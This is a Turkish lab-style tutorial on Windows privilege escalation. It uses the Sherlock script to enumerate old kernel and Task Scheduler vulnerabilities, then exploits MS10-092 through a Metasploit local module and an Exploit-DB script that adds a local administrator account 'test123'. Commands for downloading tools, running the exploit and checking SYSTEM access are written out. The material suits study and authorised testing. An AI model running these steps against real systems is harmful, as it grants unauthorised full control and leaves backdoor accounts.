Mevcut durumda “YetkisizHesap” adlı standart bir kullanıcı yetkisi ile erişim sağlandığı varsayılmaktadır.
whoami
Bu kullanıcının yetkisini yükseltmek için öncelikle Sherlock betiği indirilip çalıştırılarak zafiyetler listelenecek, sonra da MS10-092 zafiyeti istismar edilerek hak yükseltilecektir.
1) Sherlock Betiği ile Hak Yükseltme Zafiyetinin Tespiti
Hak yükseltme zafiyetinin tespiti için Sherlock betiği kullanılabilir.
https://github.com/rasta-mouse/Sherlock
Bu betik dosyasını indirmek için bitsadmin aracı kullanılabilir.
bitsadmin /transfer DosyaIndir /download /priority normal https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1 %TEMP%\HakYukseltmeZafiyetiAra.ps1
Betik çalıştırıldığında bir takım zafiyetler aranmaktadır. Bu arama işlemi tek tek yapılabileceği gibi Find-AllVulns metodu ile de topluca yapılabilmektedir.
Sherlock betiği ile araştırılan hak yükseltme zafiyetlerinin listesi aşağıdaki gibidir.
- MS10-015: User Mode to Ring (KiTrap0D) –> CVE-2010-0232
- MS10-092: Task Scheduler –> CVE-2010-3338, CVE-2010-3888
- MS13-053: NTUserMessageCall Win32k Kernel Pool Overflow –> CVE-2013-1300
- MS13-081: TrackPopupMenuEx Win32k NULL Page –> CVE-2013-3881
- MS14-058: TrackPopupMenu Win32k Null Pointer Dereference –> CVE-2014-4113
- MS15-051: ClientCopyImage Win32k –> CVE-2015-2433
- MS15-078: Font Driver Buffer Overflow –> CVE-2015-2426, CVE-2015-2433
- MS16-016: ‘mrxdav.sys’ WebDAV –> CVE-2016-0051
- MS16-032: Secondary Logon Handle –> CVE-2016-0099
- MS16-034: Windows Kernel-Mode Drivers EoP –> CVE-2016-0093, CVE-2016-0094, CVE-2016-0095, CVE-2016-0096
- MS16-135 : Win32k Elevation of Privilege –> CVE-2016-7255
- CVE-2017-7199: Nessus Agent 6.6.2 – 6.10.3 Priv Esc –> CVE-2017-7199
64 bit mimaride ve 6.1.7600 sürümündeki Windows 7 işletim sisteminde Sherlock betiği çalıştırıldığında bir takım zafiyetler keşfedilmiştir.
powershell
Import-Module .\Sherlock.ps1
Find-AllVulns
2) MSF ms10_092_schelevator İstismar Modülü ile Hak Yükseltme
Sherlock betiği tarafından tespit edilen zafiyetlerden birisi “Microsoft Windows – Task Scheduler ‘.XML’ Local Privilege Escalation” isimli CVE-2010-3338 ve CVE-2010-3888 ID’li yetki yükseltme zafiyetidir. Sherlock betiğinin istismar koduna ait bağlantı MSF içerisindeki exploit/windows/local/ms10_092_schelevator modülüne aittir.
https://www.exploit-db.com/exploits/19930/
64 bitlik bir bağlantının elde edildiği bir oturumda MSF ms10_092_schelevator hak yükseltme betiği ile istismar işlemi gerçekleştirilebilir.
sessions
use exploit/windows/local/ms10_092_schelevator
show options
Modül seçenekleri ayarlanıp, modül çalıştırıldığında yeni bir bağlantının elde edilmiştir.
set SESSION 1
exploit
Bu bağlantı, NT AUTHORITY\SYSTEM ile çalışan 64 bitlik “taskeng.exe” prosesinden oluştuğu ve yine NT AUTHORITY\SYSTEM yetkisine sahip oldunduğu görülmektedir.
getuid
getpid
ps -s
3) Exploit-DB’den İndirilen Betik ile Hak Yükseltme
Sherlock betiği tarafından tespit edilen CVE-2010-3338 ve CVE-2010-3888 ID’li yetki yükseltme zafiyeti için “Microsoft Windows – Task Scheduler Privilege Escalation” betiği de kullanılabilir.
Bu istismar kodu XML formatındaki bir zamanlanmış görevi oluşturmakta ve çağırmaktadır.
https://www.exploit-db.com/exploits/15589/
Bu betik ile “wDw00t” isimli bir zamanlanmış görev kullanılmaktadır. Başarılı bir zafiyet sonrasında, “xpl.bat” dosyasında da yazılacak olan “test123” isimli ve parolalı bir yerel yönetici kullanıcısı oluşturulmaktadır. Sonrasında da zamanlanmış görev silinmektedir.
Hak yükseltmeden önce “test123” adlı bir yerel yönetici kullanıcının olmadığı görülmektedir.
net user
net localgroup Administrators
Hak yükseltmek için ilgili betik dosyası Exploit-DB sitesinden indirilip çalıştırıldığında, “test123” adlı yerel yönetici kullanıcısının oluşturulduğu görülmektedir.
Oluşan “wDw00t.xml” dosyasında da çalışan komutun bulunduğu “xpl.bat” dosyası incelenebilir.